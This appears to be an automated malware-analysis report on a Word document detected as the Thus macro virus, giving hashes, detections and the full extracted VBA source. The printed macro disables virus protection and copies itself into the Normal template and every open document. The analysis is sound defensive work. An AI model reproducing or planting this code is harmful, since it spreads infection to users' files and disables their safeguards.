Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9081791062d34f77…

MALICIOUS

Office (OLE)

42.5 KB Created: 1997-09-17 10:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 546095be4ecbce554fc0089004560154 SHA-1: 0b3f6d22e1859f6f6f1798d9ebc04f7d942d9b5e SHA-256: 9081791062d34f770bd3fe0d4a09f39e62bc750dcbdde14dc8fca65c83bca4e4
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Thus-13. It contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening the document. The script attempts to disable virus protection and copy itself to other documents, indicating a self-propagation or evasion mechanism.

Heuristics 3

  • ClamAV: Doc.Trojan.Thus-13 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Thus-13
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1772 bytes
SHA-256: af4acb83891f2c8086ae77dc4cc4c8cf38c9a96ecab62dcc4377502be6111c75
Detection
ClamAV: Doc.Trojan.Thus-13
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub Document_Open()
'Thus_001'
'MacroKiller'

On Error Resume Next

    Dim objDoc As Document

    Application.Options.VirusProtection = False
    With NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
        If .Lines(2, 1) = "'Thus_001'" And .Lines(3, 1) <> "'MacroKiller'" Then _
            .DeleteLines 1, .CountOfLines
        If .CountOfLines = 0 Then .InsertLines 1, _
            ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines _
            (1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
    End With
    If NormalTemplate.Saved = False Then NormalTemplate.Save
    For Each objDoc In Application.Documents
        With objDoc.VBProject.VBComponents.Item(1).CodeModule
            If .Lines(2, 1) = "'Thus_001'" And .Lines(3, 1) <> "'MacroKiller'" Then _
                .DeleteLines 1, .CountOfLines
            If .CountOfLines = 0 Then .InsertLines 1, _
                ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines _
                (1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
        End With
    Next objDoc
    If Date > DateSerial(2002, 7, 5) Then
        With ThisDocument.VBProject.VBComponents.Item(1).CodeModule
            .DeleteLines 1, .CountOfLines
        End With
    End If
        
End Sub

Private Sub Document_Close()


    Document_Open
    
End Sub

Private Sub Document_New()

    Document_Open
    
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.